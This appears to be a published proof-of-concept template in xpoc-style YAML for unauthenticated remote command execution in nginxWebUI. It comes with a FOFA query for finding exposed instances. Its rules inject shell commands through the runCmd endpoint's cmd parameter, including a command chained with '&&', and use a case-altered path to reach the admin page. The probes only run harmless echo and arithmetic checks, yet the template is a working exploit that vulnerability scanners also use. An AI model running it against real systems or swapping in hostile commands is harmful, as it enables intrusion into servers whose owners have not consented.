漏洞描述
FOFA: app="nginxWebUI"
nginxwebui-rce: Nginx Web UI RCE
PoC代码[已公开]
id: nginxwebui-rce
info:
name: Nginx Web UI RCE
author: xpoc
severity: high
verified: true
description: |
FOFA: app="nginxWebUI"
tags: nginx,rce
created: 2023/06/28
set:
s1: randomInt(100000000, 200000000)
s2: randomInt(10000, 20000)
s3: string("nginx_") + randomLowercase(5)
rules:
r0:
request:
method: GET
path: /AdminPage/conf/runCmd?cmd=expr%20{{s1}}%20-%20{{s2}}%26%26echo%20nginx
expression: response.status == 200 && response.body.bcontains(bytes(string(s1 - s2))) && response.body.bcontains(b"运行失败") && response.content_type.contains("application/json")
r1:
request:
method: GET
path: /AdminPage/conf/runCmd?cmd=echo%20{{s3}}
expression: response.status == 200 && response.body.bcontains(bytes(s3)) && response.body.contains(b"运行成功") && response.content_type.contains("application/json")
r2:
request:
method: GET
path: /aDminPage/about
expression: response.status == 200 && response.body.ibcontains(b"<title>nginxWebUI</title>") && response.content_type.contains("text/html")
expression: r0() || r1() || r2()